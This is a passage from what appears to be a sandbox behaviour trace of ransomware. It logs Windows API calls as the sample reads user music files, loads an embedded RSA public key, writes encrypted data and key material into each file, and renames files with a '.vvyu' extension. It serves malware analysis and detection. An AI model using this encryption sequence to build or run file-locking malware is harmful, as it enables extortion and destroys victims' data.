dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f420 | out: hHeap=0x620000) returned 1 [0199.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.347] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x93c0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x93c0, lpOverlapped=0x0) returned 1 [0199.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.348] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x93c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.349] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.351] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.351] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.351] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.351] CloseHandle (hObject=0x510) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.353] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\o2CgGnJETcQ5zceImOM_.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\o2cggnjetcq5zceimom_.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\o2CgGnJETcQ5zceImOM_.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\o2cggnjetcq5zceimom_.m4a.vvyu")) returned 1 [0199.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.355] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.358] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8dc130, ftCreationTime.dwHighDateTime=0x1d89eb8, ftLastAccessTime.dwLowDateTime=0xfe39f390, ftLastAccessTime.dwHighDateTime=0x1d8a668, ftLastWriteTime.dwLowDateTime=0xfe39f390, ftLastWriteTime.dwHighDateTime=0x1d8a668, nFileSizeHigh=0x0, nFileSizeLow=0x16b28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xXLI1eQxvUp5i 0hs6G.mp3", cAlternateFileName="XXLI1E~1.MP3")) returned 1 [0199.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.358] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\xXLI1eQxvUp5i 0hs6G.mp3") returned=".mp3" [0199.358] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\xXLI1eQxvUp5i 0hs6G.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\xxli1eqxvup5i 0hs6g.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.359] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=92968) returned 1 [0199.359] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.362] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x16b02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.362] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.364] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.364] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x16b28, lpOverlapped=0x0) returned 1 [0199.366] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.366] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.366] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.366] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.367] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.367] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.367] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.367] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.367] GetLastError () returned 0x0 [0199.367] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.367] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.368] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.368] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.368] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16b30) returned 0x2ea79b0 [0199.369] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f420 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f468 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3158 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.372] GetCurrentThreadId () returned 0x66c [0199.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6580 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.373] GetCurrentThreadId () returned 0x66c [0199.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3170 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3188 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0199.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: 